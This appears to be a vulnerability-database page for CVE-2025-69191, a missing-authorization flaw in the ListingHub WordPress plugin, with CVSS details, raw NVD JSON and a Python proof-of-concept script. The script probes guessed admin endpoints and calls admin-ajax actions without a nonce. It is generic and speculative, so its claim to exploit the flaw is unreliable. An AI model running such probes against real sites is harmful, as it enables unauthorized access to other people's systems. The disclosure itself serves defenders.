Security Vulnerability Report
中文
CVE-2025-69191 CVSS 7.3 HIGH

CVE-2025-69191

Published: 2026-01-22 17:16:26
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in e-plugins ListingHub listinghub allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ListingHub: from n/a through <= 1.2.7.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

ListingHub <= 1.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69191 PoC - Missing Authorization in ListingHub WordPress Plugin # Target: WordPress site with ListingHub plugin <= 1.2.7 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-69191 """ # Remove trailing slash target_url = target_url.rstrip('/') # Common ListingHub AJAX endpoints that may be vulnerable vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/listinghub/v1/listings', '/wp-admin/admin.php?page=listinghub' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-69191 - ListingHub Missing Authorization") print("-" * 50) # Test unauthenticated access to admin functionality for endpoint in vulnerable_endpoints: url = f"{target_url}{endpoint}" try: response = requests.get(url, timeout=10, allow_redirects=False) print(f"[?] Endpoint: {endpoint}") print(f" Status: {response.status_code}") # Check if response indicates accessible functionality if response.status_code == 200: print(f" [!] Potentially accessible without authentication") elif response.status_code == 403: print(f" [+] Properly protected") except requests.exceptions.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") print("-" * 50) print("[*] Manual verification recommended") print("[*] Check for exposed admin actions in plugin source code") def exploit_unauthorized_access(target_url, action): """ Attempt to exploit unauthorized access action: specific action to exploit (e.g., 'listinghub_get_listings') """ target_url = target_url.rstrip('/') url = f"{target_url}/wp-admin/admin-ajax.php" data = { 'action': action, 'nonce': '' # May not be required due to missing authorization } print(f"[*] Attempting action: {action}") try: response = requests.post(url, data=data, timeout=10) print(f"[?] Response status: {response.status_code}") print(f"[?] Response preview: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-69191.py <target_url>") print("Example: python cve-2025-69191.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69191", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:26.003", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in e-plugins ListingHub listinghub allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ListingHub: from n/a through <= 1.2.7."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en e-plugins ListingHub listinghub permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a ListingHub: desde n/a hasta &lt;= 1.2.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/listinghub/vulnerability/wordpress-listinghub-plugin-1-2-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}